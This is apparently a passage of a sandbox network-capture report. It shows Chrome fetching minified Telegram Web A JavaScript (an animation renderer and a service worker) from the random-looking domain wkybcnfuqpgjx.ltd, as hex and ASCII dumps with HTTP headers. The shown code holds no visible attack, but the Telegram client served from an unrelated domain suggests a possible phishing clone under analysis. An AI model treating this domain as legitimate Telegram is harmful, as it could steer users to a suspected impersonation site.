                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:47 UTC936INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:47 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-29c8"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6952
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qht4UspXcyZ5idI1NppGHeKPHv%2F%2BZ5MxQMA%2FNSGKV%2BvS%2F2yBGWzs5RCj2G23d%2BYu4w9ijtlqVi6aWYPLEkDnJN3BY%2FQ%2Burio%2BK3ZjORyig2mubbOgFuGtc58QwCbdLrO0M4QdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ae9833de92-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=12010&min_rtt=1631&rtt_var=6906&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=947&delivery_rate=1790312&cwnd=240&unsent_bytes=0&cid=5694b5edd5e1eef4&ts=182&x=0"
                                  2025-01-12 00:03:47 UTC433INData Raw: 32 39 63 38 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 74 65 6c 65 67 72 61 6d 5f 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 36 37 33 5d 2c 7b 38 36 37 33 3a 28 65 2c 74 2c 73 29 3d 3e 7b 73 2e 72 28 74 29 2c 73 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 53 7d 29 3b 76 61 72 20 69 3d 73 28 39 38 32 32 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 2f 65 29 2a 65 7d 76 61 72 20 61 3d 73 28 39 37 30 35 29 2c 6e 3d 73 28 34 32 33 35 29 2c 6f 3d 73 28 31 34 38 31 29 2c 68 3d 73 28 37 38 33 36 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74
                                  Data Ascii: 29c8"use strict";(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[8673],{8673:(e,t,s)=>{s.r(t),s.d(t,{default:()=>S});var i=s(9822);function r(e,t){return t-Math.floor(t/e)*e}var a=s(9705),n=s(4235),o=s(1481),h=s(7836);function d(e,t
                                  2025-01-12 00:03:47 UTC1369INData Raw: 65 74 75 72 6e 20 69 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 40 40 74 6f 50 72 69 6d 69 74 69 76 65 20 6d 75 73 74 20 72 65 74 75 72 6e 20 61 20 70 72 69 6d 69 74 69 76 65 20 76 61 6c 75 65 2e 22 29 7d 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 65 29 7d 28 74 29 29 3f 69 3a 69 2b 22 22 29 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 73 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 73 2c 65 7d 63 6c 61 73 73 20 63 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 73 29 7b 74 68 69 73 2e 74 61 72 67 65 74 3d 65 2c 74 68 69 73 2e 6f 6e 55 70 64 61 74 65 3d 74 2c
                                  Data Ascii: eturn i;throw new TypeError("@@toPrimitive must return a primitive value.")}return String(e)}(t))?i:i+"")in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e}class c{constructor(e,t,s){this.target=e,this.onUpdate=t,
                                  2025-01-12 00:03:47 UTC1369INData Raw: 72 6f 67 72 65 73 73 22 2c 6d 65 73 73 61 67 65 49 64 3a 74 7d 29 7d 6f 6e 4d 65 73 73 61 67 65 28 65 29 7b 63 6f 6e 73 74 7b 72 65 71 75 65 73 74 53 74 61 74 65 73 3a 74 2c 63 68 61 6e 6e 65 6c 3a 73 7d 3d 74 68 69 73 3b 65 2e 63 68 61 6e 6e 65 6c 3d 3d 3d 73 26 26 65 2e 70 61 79 6c 6f 61 64 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 69 66 28 22 75 70 64 61 74 65 22 3d 3d 3d 65 2e 74 79 70 65 26 26 74 68 69 73 2e 6f 6e 55 70 64 61 74 65 26 26 74 68 69 73 2e 6f 6e 55 70 64 61 74 65 28 65 2e 75 70 64 61 74 65 29 2c 22 6d 65 74 68 6f 64 52 65 73 70 6f 6e 73 65 22 3d 3d 3d 65 2e 74 79 70 65 29 7b 63 6f 6e 73 74 20 73 3d 74 2e 67 65 74 28 65 2e 6d 65 73 73 61 67 65 49 64 29 3b 73 26 26 28 65 2e 65 72 72 6f 72 3f 73 2e 72 65 6a 65 63 74 28 65 2e 65 72 72 6f
                                  Data Ascii: rogress",messageId:t})}onMessage(e){const{requestStates:t,channel:s}=this;e.channel===s&&e.payloads.forEach((e=>{if("update"===e.type&&this.onUpdate&&this.onUpdate(e.update),"methodResponse"===e.type){const s=t.get(e.messageId);s&&(e.error?s.reject(e.erro
                                  2025-01-12 00:03:47 UTC1369INData Raw: 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 72 29 7d 2c 69 7d 28 65 29 3b 72 65 74 75 72 6e 7b 77 6f 72 6b 65 72 3a 65 2c 63 6f 6e 6e 65 63 74 6f 72 3a 74 7d 7d 29 29 29 2c 6d 29 29 2e 6d 61 70 28 28 65 3d 3e 7b 6c 65 74 7b 63 6f 6e 6e 65 63 74 6f 72 3a 74 7d 3d 65 3b 72 65 74 75 72 6e 20 74 7d 29 29 2c 46 3d 6e 65 77 20 4d 61 70 2c 43 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65 74 20 62 3d 2d 31 3b 63 6c 61 73 73 20 4d 7b 73 74 61 74 69 63 20 69 6e 69 74 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 74 3d 6e 65 77 20 41 72 72 61 79 28 65 29 2c 73 3d 30 3b 73 3c 65 3b 73 2b 2b 29 74 5b 73 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 3b 63 6f 6e 73 74 5b 2c 69 2c
                                  Data Ascii: e.removeEventListener("message",r)},i}(e);return{worker:e,connector:t}}))),m)).map((e=>{let{connector:t}=e;return t})),F=new Map,C=new WeakMap;let b=-1;class M{static init(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];const[,i,
                                  2025-01-12 00:03:47 UTC1369INData Raw: 63 6f 6f 72 64 73 3a 72 7d 3d 74 68 69 73 2e 76 69 65 77 73 2e 67 65 74 28 65 29 3b 69 3f 73 2e 63 6c 65 61 72 52 65 63 74 28 72 2e 78 2c 72 2e 79 2c 74 68 69 73 2e 69 6d 67 53 69 7a 65 2c 74 68 69 73 2e 69 6d 67 53 69 7a 65 29 3a 74 2e 72 65 6d 6f 76 65 28 29 2c 74 68 69 73 2e 76 69 65 77 73 2e 64 65 6c 65 74 65 28 65 29 2c 74 68 69 73 2e 76 69 65 77 73 2e 73 69 7a 65 7c 7c 74 68 69 73 2e 64 65 73 74 72 6f 79 28 29 7d 69 73 50 6c 61 79 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 41 6e 69 6d 61 74 69 6e 67 7c 7c 74 68 69 73 2e 69 73 57 61 69 74 69 6e 67 7d 70 6c 61 79 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 26 26 61 72 67 75 6d 65
                                  Data Ascii: coords:r}=this.views.get(e);i?s.clearRect(r.x,r.y,this.imgSize,this.imgSize):t.remove(),this.views.delete(e),this.views.size||this.destroy()}isPlaying(){return this.isAnimating||this.isWaiting}play(){let e=arguments.length>0&&void 0!==arguments[0]&&argume
                                  2025-01-12 00:03:47 UTC1369INData Raw: 69 29 3b 6c 65 74 5b 6e 2c 6f 5d 3d 5b 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 5d 3b 69 66 28 61 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 63 61 6c 63 53 69 7a 65 46 61 63 74 6f 72 28 29 3b 5b 6e 2c 6f 5d 3d 50 28 69 2c 65 29 2c 72 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 6e 2c 6f 29 2c 69 2e 64 61 74 61 73 65 74 2e 69 73 4a 75 73 74 43 6c 65 61 6e 65 64 3d 22 74 72 75 65 22 2c 28 30 2c 70 2e 59 53 29 28 28 28 29 3d 3e 7b 69 2e 64 61 74 61 73 65 74 2e 69 73 4a 75 73 74 43 6c 65 61 6e 65 64 3d 22 66 61 6c 73 65 22 7d 29 29 7d 73 2e 63 6f 6f 72 64 73 3d 7b 78 3a 4d 61 74 68 2e 72 6f 75 6e 64 28 28 74 3f 2e 78 7c 7c 30 29 2a 6e 29 2c 79 3a 4d 61 74 68 2e 72 6f 75 6e 64 28 28 74 3f 2e 79 7c 7c 30 29 2a 6f 29 7d 3b 63 6f 6e 73 74 20 68 3d 74 68
                                  Data Ascii: i);let[n,o]=[i.width,i.height];if(a){const e=this.calcSizeFactor();[n,o]=P(i,e),r.clearRect(0,0,n,o),i.dataset.isJustCleaned="true",(0,p.YS)((()=>{i.dataset.isJustCleaned="false"}))}s.coords={x:Math.round((t?.x||0)*n),y:Math.round((t?.y||0)*o)};const h=th
                                  2025-01-12 00:03:47 UTC1369INData Raw: 3d 74 68 69 73 2e 70 61 72 61 6d 73 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 77 69 6e 64 6f 77 2e 64 65 76 69 63 65 50 69 78 65 6c 52 61 74 69 6f 2a 73 2c 31 29 7d 64 65 73 74 72 6f 79 28 29 7b 74 68 69 73 2e 69 73 44 65 73 74 72 6f 79 65 64 3d 21 30 2c 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 63 6c 65 61 72 43 61 63 68 65 28 29 2c 74 68 69 73 2e 64 65 73 74 72 6f 79 52 65 6e 64 65 72 65 72 28 29 2c 46 2e 64 65 6c 65 74 65 28 74 68 69 73 2e 72 65 6e 64 65 72 49 64 29 7d 63 6c 65 61 72 43 61 63 68 65 28 29 7b 74 68 69 73 2e 66 72 61 6d 65 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 26 26 65 21 3d 3d 66 26 26 65 2e 63 6c 6f 73 65 28 29 7d 29 29 2c 74 68 69 73 2e 69 6d 61 67 65 44 61 74 61 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 66
                                  Data Ascii: =this.params;return Math.max(window.devicePixelRatio*s,1)}destroy(){this.isDestroyed=!0,this.pause(),this.clearCache(),this.destroyRenderer(),F.delete(this.renderId)}clearCache(){this.frames.forEach((e=>{e&&e!==f&&e.close()})),this.imageData=void 0,this.f
                                  2025-01-12 00:03:47 UTC1369INData Raw: 69 6e 67 26 26 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 76 69 65 77 73 2e 76 61 6c 75 65 73 28 29 29 2e 65 76 65 72 79 28 28 65 3d 3e 7b 6c 65 74 7b 69 73 4c 6f 61 64 65 64 3a 74 7d 3d 65 3b 72 65 74 75 72 6e 20 74 7d 29 29 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 65 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 61 70 70 72 6f 78 46 72 61 6d 65 49 6e 64 65 78 29 2c 74 3d 74 68 69 73 2e 67 65 74 46 72 61 6d 65 28 65 29 3b 69 66 28 21 74 7c 7c 74 3d 3d 3d 66 29 72 65 74 75 72 6e 20 74 7c 7c 74 68 69 73 2e 72 65 71 75 65 73 74 46 72 61 6d 65 28 65 29 2c 74 68 69 73 2e 69 73 41 6e 69 6d 61 74 69 6e 67 3d 21 31 2c 74 68 69 73 2e 69 73 57 61 69 74 69 6e 67 3d 21 30 2c 21 31 3b 74 68 69 73 2e 63 61 63 68 65 4d 6f 64 75 6c 6f 26 26 65 25 74 68
                                  Data Ascii: ing&&Array.from(this.views.values()).every((e=>{let{isLoaded:t}=e;return t})))return!1;const e=Math.round(this.approxFrameIndex),t=this.getFrame(e);if(!t||t===f)return t||this.requestFrame(e),this.isAnimating=!1,this.isWaiting=!0,!1;this.cacheModulo&&e%th
                                  2025-01-12 00:03:47 UTC688INData Raw: 6e 67 3d 21 30 2c 74 68 69 73 2e 69 73 41 6e 69 6d 61 74 69 6e 67 3d 21 31 2c 21 31 29 7d 29 2c 70 2e 52 4b 29 29 29 7d 67 65 74 46 72 61 6d 65 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 72 61 6d 65 73 5b 65 5d 7d 72 65 71 75 65 73 74 46 72 61 6d 65 28 65 29 7b 74 68 69 73 2e 66 72 61 6d 65 73 5b 65 5d 3d 66 2c 49 5b 74 68 69 73 2e 77 6f 72 6b 65 72 49 6e 64 65 78 5d 2e 72 65 71 75 65 73 74 28 7b 6e 61 6d 65 3a 22 72 6c 6f 74 74 69 65 3a 72 65 6e 64 65 72 46 72 61 6d 65 73 22 2c 61 72 67 73 3a 5b 74 68 69 73 2e 72 65 6e 64 65 72 49 64 2c 65 2c 74 68 69 73 2e 6f 6e 46 72 61 6d 65 4c 6f 61 64 2e 62 69 6e 64 28 74 68 69 73 29 5d 7d 29 7d 63 6c 65 61 6e 75 70 50 72 65 76 46 72 61 6d 65 28 65 29 7b 69 66 28 74 68 69 73 2e 66 72 61 6d 65 73 43 6f 75 6e
                                  Data Ascii: ng=!0,this.isAnimating=!1,!1)}),p.RK)))}getFrame(e){return this.frames[e]}requestFrame(e){this.frames[e]=f,I[this.workerIndex].request({name:"rlottie:renderFrames",args:[this.renderId,e,this.onFrameLoad.bind(this)]})}cleanupPrevFrame(e){if(this.framesCoun
                                  2025-01-12 00:03:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  37192.168.2.649836172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:47 UTC478OUTGET /5284.41380bbee618193f889a.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  Cache-Control: max-age=0
                                  Accept: */*
                                  Service-Worker: script
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: same-origin
                                  Sec-Fetch-Dest: serviceworker
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:47 UTC937INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:47 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-27a2"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 6954
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ASGWwppKmALoyjvBZfG%2BSRc%2BJXSsDFp8oi2rRhj%2FmpwI6zoGl%2F2M8clBsSqPL8fVB%2BQVAdo4o2NDnCd248Hiafv3dOSPyVZgrPGqxLj%2FLPGB%2BJuDEyEO%2FaLvrcAXZsuvcQR%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ae8a3815c7-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=11713&min_rtt=1904&rtt_var=6702&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1056&delivery_rate=1533613&cwnd=252&unsent_bytes=0&cid=2a9bb185dc888cfa&ts=176&x=0"
                                  2025-01-12 00:03:47 UTC432INData Raw: 32 37 61 32 0d 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 21 31 2c 74 3d 22 74 74 2d 6d 65 64 69 61 2d 70 72 6f 67 72 65 73 73 69 76 65 22 2c 6e 3d 22 74 74 2d 61 73 73 65 74 73 22 2c 73 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 2c 4d 61 74 68 2e 72 6f 75 6e 64 28 34 35 30 29 2c 6e 65 77 20 53 65 74 28 5b 22 6e 65 77 4d 65 73 73 61 67 65 22 2c 22 6e 65 77 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 22 2c 22 64 65 6c 65 74 65 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 48 69 73 74 6f 72 79 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b
                                  Data Ascii: 27a2(()=>{"use strict";const e=!1,t="tt-media-progressive",n="tt-assets",s=("undefined"!=typeof window&&window.innerHeight,Math.round(450),new Set(["newMessage","newScheduledMessage","deleteMessages","deleteScheduledMessages","deleteHistory"]),new Set([
                                  2025-01-12 00:03:47 UTC1369INData Raw: 2c 22 61 75 64 69 6f 2f 6d 70 34 22 2c 22 61 75 64 69 6f 2f 78 2d 6d 34 61 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 2e 2e 2e 73 2c 2e 2e 2e 61 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 55 53 45 52 4e 41 4d 45 5f 50 55 52 43 48 41 53 45 5f 41 56 41 49 4c 41 42 4c 45 22 2c 22 55 53 45 52 4e 41 4d 45 5f 49 4e 56 41 4c 49 44 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 74 2e 6d 65 22 2c 22 77 65 62 2e 74 2e 6d 65 22 2c 22 61 2e 74 2e 6d 65 22 2c 22 6b 2e 74 2e 6d 65 22 2c 22 7a 2e 74 2e 6d 65 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 41 55 22 2c 22 42 44 22 2c 22 43 41 22 2c 22 43 4f 22 2c 22 45 47 22 2c 22 48 4e 22 2c 22 49 45 22 2c 22 49 4e 22 2c 22 4a 4f 22 2c 22 4d 58 22 2c 22 4d 59 22 2c 22 4e 49 22 2c 22 4e 5a 22 2c 22 50 48 22 2c 22 50 4b 22 2c 22 53 41 22 2c
                                  Data Ascii: ,"audio/mp4","audio/x-m4a"]),new Set([...s,...a]),new Set(["USERNAME_PURCHASE_AVAILABLE","USERNAME_INVALID"]),new Set(["t.me","web.t.me","a.t.me","k.t.me","z.t.me"]),new Set(["AU","BD","CA","CO","EG","HN","IE","IN","JO","MX","MY","NI","NZ","PH","PK","SA",
                                  2025-01-12 00:03:47 UTC1369INData Raw: 4d 65 73 73 61 67 65 28 7b 74 79 70 65 3a 22 72 65 71 75 65 73 74 50 61 72 74 22 2c 6d 65 73 73 61 67 65 49 64 3a 73 2c 70 61 72 61 6d 73 3a 74 7d 29 2c 72 7d 73 65 6c 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 28 65 3d 3e 7b 63 6f 6e 73 74 7b 74 79 70 65 3a 74 2c 6d 65 73 73 61 67 65 49 64 3a 6e 2c 72 65 73 75 6c 74 3a 73 7d 3d 65 2e 64 61 74 61 3b 69 66 28 22 70 61 72 74 52 65 73 70 6f 6e 73 65 22 3d 3d 3d 74 29 7b 63 6f 6e 73 74 20 65 3d 75 2e 67 65 74 28 6e 29 3b 65 26 26 65 2e 72 65 73 6f 6c 76 65 28 73 29 7d 7d 29 29 3b 63 6f 6e 73 74 20 66 3d 31 30 34 38 35 37 36 3b 63 6c 61 73 73 20 70 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 73 3b 65 3d 74 68 69 73 2c 6e 3d 76 6f 69 64
                                  Data Ascii: Message({type:"requestPart",messageId:s,params:t}),r}self.addEventListener("message",(e=>{const{type:t,messageId:n,result:s}=e.data;if("partResponse"===t){const e=u.get(n);e&&e.resolve(s)}}));const f=1048576;class p{constructor(){var e,t,n,s;e=this,n=void
                                  2025-01-12 00:03:47 UTC1369INData Raw: 2c 62 6f 64 79 3a 73 2c 74 69 74 6c 65 3a 61 2c 69 63 6f 6e 3a 69 2c 72 65 61 63 74 69 6f 6e 3a 6f 2c 69 73 53 69 6c 65 6e 74 3a 72 2c 73 68 6f 75 6c 64 52 65 70 6c 61 63 65 48 69 73 74 6f 72 79 3a 63 7d 3d 65 3b 63 6f 6e 73 74 20 6c 3d 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 2d 6d 3c 31 65 33 2c 75 3d 7b 62 6f 64 79 3a 73 2c 64 61 74 61 3a 7b 63 68 61 74 49 64 3a 74 2c 6d 65 73 73 61 67 65 49 64 3a 6e 2c 72 65 61 63 74 69 6f 6e 3a 6f 2c 63 6f 75 6e 74 3a 31 2c 73 68 6f 75 6c 64 52 65 70 6c 61 63 65 48 69 73 74 6f 72 79 3a 63 7d 2c 69 63 6f 6e 3a 69 7c 7c 22 69 63 6f 6e 2d 31 39 32 78 31 39 32 2e 70 6e 67 22 2c 62 61 64 67 65 3a 22 69 63 6f 6e 2d 31 39 32 78 31 39 32 2e 70 6e 67 22 2c 74 61 67 3a 53 74 72 69 6e 67 28 6c 3f 30 3a 74 7c
                                  Data Ascii: ,body:s,title:a,icon:i,reaction:o,isSilent:r,shouldReplaceHistory:c}=e;const l=(new Date).valueOf()-m<1e3,u={body:s,data:{chatId:t,messageId:n,reaction:o,count:1,shouldReplaceHistory:c},icon:i||"icon-192x192.png",badge:"icon-192x192.png",tag:String(l?0:t|
                                  2025-01-12 00:03:47 UTC1369INData Raw: 65 64 22 29 2c 74 2e 77 61 69 74 55 6e 74 69 6c 28 73 65 6c 66 2e 73 6b 69 70 57 61 69 74 69 6e 67 28 29 29 7d 29 29 2c 73 65 6c 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 63 74 69 76 61 74 65 22 2c 28 74 3d 3e 7b 65 26 26 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 53 65 72 76 69 63 65 57 6f 72 6b 65 72 20 61 63 74 69 76 61 74 65 64 22 29 2c 74 2e 77 61 69 74 55 6e 74 69 6c 28 50 72 6f 6d 69 73 65 2e 72 61 63 65 28 5b 69 28 33 65 33 29 2c 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 73 65 6c 66 2e 63 61 63 68 65 73 2e 64 65 6c 65 74 65 28 6e 29 2c 73 65 6c 66 2e 63 6c 69 65 6e 74 73 2e 63 6c 61 69 6d 28 29 5d 29 5d 29 29 7d 29 29 2c 73 65 6c 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 66 65 74 63 68 22 2c 28 73 3d 3e 7b 63 6f 6e
                                  Data Ascii: ed"),t.waitUntil(self.skipWaiting())})),self.addEventListener("activate",(t=>{e&&console.log("ServiceWorker activated"),t.waitUntil(Promise.race([i(3e3),Promise.all([self.caches.delete(n),self.clients.claim()])]))})),self.addEventListener("fetch",(s=>{con
                                  2025-01-12 00:03:47 UTC1369INData Raw: 69 74 20 64 28 6e 2c 7b 75 72 6c 3a 73 2c 73 74 61 72 74 3a 6f 2c 65 6e 64 3a 6c 7d 29 7d 63 61 74 63 68 28 74 29 7b 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 45 54 43 48 20 50 52 4f 47 52 45 53 53 49 56 45 22 2c 74 29 7d 69 66 28 21 68 29 72 65 74 75 72 6e 20 6e 65 77 20 52 65 73 70 6f 6e 73 65 28 22 22 2c 7b 73 74 61 74 75 73 3a 35 30 30 2c 73 74 61 74 75 73 54 65 78 74 3a 22 46 61 69 6c 65 64 20 74 6f 20 66 65 74 63 68 20 70 72 6f 67 72 65 73 73 69 76 65 20 70 61 72 74 22 7d 29 3b 63 6f 6e 73 74 7b 61 72 72 61 79 42 75 66 66 65 72 3a 6d 2c 66 75 6c 6c 53 69 7a 65 3a 77 2c 6d 69 6d 65 54 79 70 65 3a 67 7d 3d 68 2c 79 3d 4d 61 74 68 2e 6d 69 6e 28 6c 2d 6f 2b 31 2c 6d 2e 62 79 74 65 4c 65 6e 67 74 68 29 3b 6c 3d 6f 2b 79 2d 31 3b 63 6f 6e
                                  Data Ascii: it d(n,{url:s,start:o,end:l})}catch(t){e&&console.error("FETCH PROGRESSIVE",t)}if(!h)return new Response("",{status:500,statusText:"Failed to fetch progressive part"});const{arrayBuffer:m,fullSize:w,mimeType:g}=h,y=Math.min(l-o+1,m.byteLength);l=o+y-1;con
                                  2025-01-12 00:03:47 UTC1369INData Raw: 6c 6c 28 65 29 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 20 6c 2e 70 6f 70 28 29 3b 74 3f 28 65 2e 65 6e 71 75 65 75 65 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 74 29 29 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 3c 66 3f 65 2e 63 6c 6f 73 65 28 29 3a 68 3c 6f 26 26 28 68 3d 75 28 68 29 29 29 3a 65 2e 63 6c 6f 73 65 28 29 7d 7d 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 73 70 6f 6e 73 65 28 6d 2c 7b 73 74 61 74 75 73 3a 32 30 30 2c 73 74 61 74 75 73 54 65 78 74 3a 22 4f 4b 22 2c 68 65 61 64 65 72 73 3a 63 7d 29 7d 28 73 29 29 2c 21 30 3b 69 66 28 6c 2e 69 6e 63 6c 75 64 65 73 28 22 2f 73 68 61 72 65 2f 22 29 26 26 73 2e 72 65 73 70 6f 6e 64 57 69 74 68 28 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 50 4f 53 54 22 3d 3d 3d 65 2e
                                  Data Ascii: ll(e){const t=await l.pop();t?(e.enqueue(new Uint8Array(t)),t.byteLength<f?e.close():h<o&&(h=u(h))):e.close()}});return new Response(m,{status:200,statusText:"OK",headers:c})}(s)),!0;if(l.includes("/share/")&&s.respondWith(async function(e){if("POST"===e.
                                  2025-01-12 00:03:47 UTC1369INData Raw: 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 74 69 74 6c 65 7c 7c 22 54 65 6c 65 67 72 61 6d 20 57 65 62 20 41 22 3b 63 6f 6e 73 74 20 6e 3d 65 2e 63 75 73 74 6f 6d 3f 2e 73 69 6c 65 6e 74 3d 3d 3d 68 2e 54 72 75 65 3b 72 65 74 75 72 6e 20 6e 26 26 28 74 2b 3d 22 20 f0 9f 94 95 22 29 2c 7b 63 68 61 74 49 64 3a 79 28 65 29 2c 6d 65 73 73 61 67 65 49 64 3a 76 28 65 29 2c 62 6f 64 79 3a 65 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 69 73 53 69 6c 65 6e 74 3a 6e 2c 74 69 74 6c 65 3a 74 7d 7d 28 6e 29 3b 77 2e 68 61 73 28 73 2e 6d 65 73 73 61 67 65 49 64 29 3f 77 2e 64 65 6c 65 74 65 28 73 2e 6d 65 73 73 61 67 65 49 64 29 3a 74 2e 77 61 69 74 55 6e 74 69 6c 28 62 28 73 29 29 7d 29 29 2c 73 65 6c 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6e 6f
                                  Data Ascii: tion(e){let t=e.title||"Telegram Web A";const n=e.custom?.silent===h.True;return n&&(t+=" "),{chatId:y(e),messageId:v(e),body:e.description,isSilent:n,title:t}}(n);w.has(s.messageId)?w.delete(s.messageId):t.waitUntil(b(s))})),self.addEventListener("no
